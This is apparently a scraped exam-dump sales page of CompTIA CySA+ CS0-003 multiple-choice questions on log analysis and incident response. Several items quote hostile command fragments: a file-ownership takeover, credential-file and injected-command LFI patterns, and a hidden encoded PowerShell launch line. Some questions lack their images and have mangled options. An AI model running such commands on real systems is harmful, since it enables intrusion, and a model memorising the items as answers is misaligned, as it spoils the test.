While reviewing web server logs, a security analyst discovers the following suspicious line:

CS0-003 Question 99

Which of the following is being attempted?

Options:

A.

Remote file inclusion

B.

Command injection

C.

Server-side request forgery

D.

Reverse shell

Buy Now
Questions 100

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

CS0-003 Question 100

Which of the following has most likely occurred?

Options:

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Buy Now
Questions 101

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

CS0-003 Question 101

Which of the following is most likely occurring, based on the events in the log?

Options:

A.

An adversary is attempting to find the shortest path of compromise.

B.

An adversary is performing a vulnerability scan.

C.

An adversary is escalating privileges.

D.

An adversary is performing a password stuffing attack..

Buy Now
Questions 102

Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?

Options:

A.

CASB

B.

DMARC

C.

SIEM

D.

PAM

Buy Now
Questions 103

During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an incident?

Options:

A.

Implement data encryption and close the data so only the company has access.

B.

Ensure permissions are limited in the investigation team and encrypt the data.

C.

Implement data encryption and create a standardized procedure for deleting data that is no longer needed.

D.

Ensure that permissions are open only to the company.

Buy Now
Questions 104

Which of the following best describes the goal of a tabletop exercise?

Options:

A.

To test possible incident scenarios and how to react properly

B.

To perform attack exercises to check response effectiveness

C.

To understand existing threat actors and how to replicate their techniques

D.

To check the effectiveness of the business continuity plan

Buy Now
Questions 105

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

Options:

A.

Enabling a user account lockout after a limited number of failed attempts

B.

Installing a third-party remote access tool and disabling RDP on all devices

C.

Implementing a firewall block for the remote system's IP address

D.

Increasing the verbosity of log-on event auditing on all devices

Buy Now
Questions 106

A vulnerability scan shows the following vulnerabilities in the environment:

CS0-003 Question 106

At the same time, the following security advisory was released:

"A zero-day vulnerability with a CVSS score of 10 may be affecting your web server. The vendor is working on a patch or workaround."

Which of the following actions should the security analyst take first?

Options:

A.

Contact the web systems administrator and request that they shut down the asset.

B.

Monitor the patch releases for all items and escalate patching to the appropriate team.

C.

Run the vulnerability scan again to verify the presence of the critical finding and the zero-day vulnerability in the environment.

D.

Forward the advisory to the web security team and initiate the prioritization strategy for the other vulnerabilities.

Buy Now
Questions 107

Which of the following is the most appropriate action a security analyst to take to effectively identify the most security risks associated with a locally hosted server?

Options:

A.

Run the operating system update tool to apply patches that are missing.

B.

Contract an external penetration tester to attempt a brute-force attack.

C.

Download a vendor support agent to validate drivers that are installed.

D.

Execute a vulnerability scan against the target host.

Buy Now
Questions 108

During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees

takeown/f .*

SUCCESS:

Which of the following best describes the potentially malicious activity observed?

Options:

A.

Registry changes or anomalies

B.

Data exfiltration

C.

Unauthorized privileges

D.

File configuration changes

Buy Now
Questions 109

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server

logs for evidence of exploitation of that particular vulnerability?

Options:

A.

/etc/ shadow

B.

curl localhost

C.

; printenv

D.

cat /proc/self/

Buy Now
Questions 110

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

Options:

A.

SOAR

B.

SIEM

C.

SLA

D.

IoC

Buy Now
Questions 111

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

Options:

A.

Clone the virtual server for forensic analysis

B.

Log in to the affected server and begin analysis of the logs

C.

Restore from the last known-good backup to confirm there was no loss of connectivity

D.

Shut down the affected server immediately

Buy Now
Questions 112

A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would best all ow the organization to identity rogue

devices more quickly?

Options:

A.

Implement a continuous monitoring policy.

B.

Implement a BYOD policy.

C.

Implement a portable wireless scanning policy.

D.

Change the frequency of network scans to once per month.

Buy Now
Questions 113

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

CS0-003 Question 113

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

Options:

A.

InLoud:Cobain: YesGrohl: NoNovo: YesSmear: YesChanning: No

B.

TSpirit:Cobain: YesGrohl: YesNovo: YesSmear: NoChanning: No

C.

ENameless:Cobain: YesGrohl: NoNovo: YesSmear: NoChanning: No

D.

PBleach:Cobain: YesGrohl: NoNovo: NoSmear: NoChanning: Yes

Buy Now
Questions 114

A healthcare organization must develop an action plan based on the findings from a risk

assessment. The action plan must consist of:

· Risk categorization

· Risk prioritization

. Implementation of controls

INSTRUCTIONS

Click on the audit report, risk matrix, and SLA expectations documents to review their

contents.

On the Risk categorization tab, determine the order in which the findings must be

prioritized for remediation according to the risk rating score. Then, assign a categorization to each risk.

On the Controls tab, select the appropriate control(s) to implement for each risk finding.

Findings may have more than one control implemented. Some controls may be used

more than once or not at all.

If at any time you would like to bring back the initial state of the simulation, please click

the Reset All button.

CS0-003 Question 114

CS0-003 Question 114

CS0-003 Question 114

CS0-003 Question 114

CS0-003 Question 114

Options:

Buy Now
Questions 115

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

Options:

A.

Information sharing organization

B.

Blogs/forums

C.

Cybersecuritv incident response team

D.

Deep/dark web

Buy Now
Questions 116

The security team reviews a web server for XSS and runs the following Nmap scan:

CS0-003 Question 116

Which of the following most accurately describes the result of the scan?

Options:

A.

An output of characters > and " as the parameters used m the attempt

B.

The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned

C.

The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe

D.

The vulnerable parameter and characters > and " with a reflected XSS attempt

Buy Now
Questions 117

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

CS0-003 Question 117

Which of the following best describes the suspicious activity that is occurring?

Options:

A.

A fake antivirus program was installed by the user.

B.

A network drive was added to allow exfiltration of data

C.

A new program has been set to execute on system start

D.

The host firewall on 192.168.1.10 was disabled.

Buy Now
Questions 118

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation:

cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -EncodedCommand

Which of the following should the analyst use to gather more information about the purpose of this command?

Options:

A.

Echo the command payload content into 'base64 -d'.

B.

Execute the command from a Windows VM.

C.

Use a command console with administrator privileges to execute the code.

D.

Run the command as an unprivileged user from the analyst workstation.

Buy Now
Questions 119

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

CS0-003 Question 119

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an HttpOnlvflaq to force communication by HTTPS

B.

Block requests without an X-Frame-Options header

C.

Configure an Access-Control-Allow-Origin header to authorized domains

D.

Disable the cross-origin resource sharing header

Buy Now
Questions 120

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

Options:

A.

Code analysis

B.

Static analysis

C.

Reverse engineering

D.

Fuzzing

Buy Now
Questions 121

An analyst is reviewing a dashboard from the company’s SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?

Options:

A.

MITRE ATT&CK

B.

OSSTMM

C.

Diamond Model of Intrusion Analysis

D.

OWASP

Buy Now
Questions 122

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?

Options:

A.

Multifactor authentication

B.

Password changes

C.

System hardening

D.

Password encryption

Buy Now
Questions 123

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

Options:

A.

A mean time to remediate of 30 days

B.

A mean time to detect of 45 days

C.

A mean time to respond of 15 days

D.

Third-party application testing

Buy Now
Questions 124

ID

Source

Destination

Protocol

Service

1

172.16.1.1

172.16.1.10

ARP

AddrResolve

2

172.16.1.10

172.16.1.20

TCP 135

RPC Kerberos

3

172.16.1.10

172.16.1.30

TCP 445

SMB WindowsExplorer

4

172.16.1.30

5.29.1.5

TCP 443

HTTPS Browser.exe

5

11.4.11.28

172.16.1.1

TCP 53

DNS Unknown

6

20.109.209.108

172.16.1.1

TCP 443

HTTPS WUS

7

172.16.1.25

bank.backup.com

TCP 21

FTP FileZilla

Which of the following represents the greatest concerns with regard to potential data exfiltration? (Select two.)

Options:

A.

1

B.

2

C.

3

D.

4

E.

5

F.

6

G.

7

Buy Now
Questions 125

Which of the following is the best use of automation in cybersecurity?

Options:

A.

Ensure faster incident detection, analysis, and response.

B.

Eliminate configuration errors when implementing new hardware.

C.

Lower costs by reducing the number of necessary staff.

D.

Reduce the time for internal user access requests.

Buy Now
Questions 126

Which of the following is the most important reason for an incident response team to develop a formal incident declaration?

Options:

A.

To require that an incident be reported through the proper channels

B.

To identify and document staff who have the authority to declare an incident

C.

To allow for public disclosure of a security event impacting the organization

D.

To establish the department that is responsible for responding to an incident

Buy Now
Questions 127

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

Options:

A.

Impact

B.

Vulnerability score

C.

Mean time to detect

D.

Isolation

Buy Now
Exam Code: CS0-003
Exam Name: CompTIA CyberSecurity Analyst CySA+ Certification Exam
Last Update: Mar 26, 2025
Questions: 424

PDF + Testing Engine

$49.5  $164.99

Testing Engine

$37.5  $124.99
buy now CS0-003 testing engine

PDF (Q&A)

$31.5  $104.99
buy now CS0-003 pdf
dumpsmate guaranteed to pass
24/7 Customer Support

DumpsMate's team of experts is always available to respond your queries on exam preparation. Get professional answers on any topic of the certification syllabus. Our experts will thoroughly satisfy you.

Site Secure

mcafee secure

TESTED 29 Mar 2025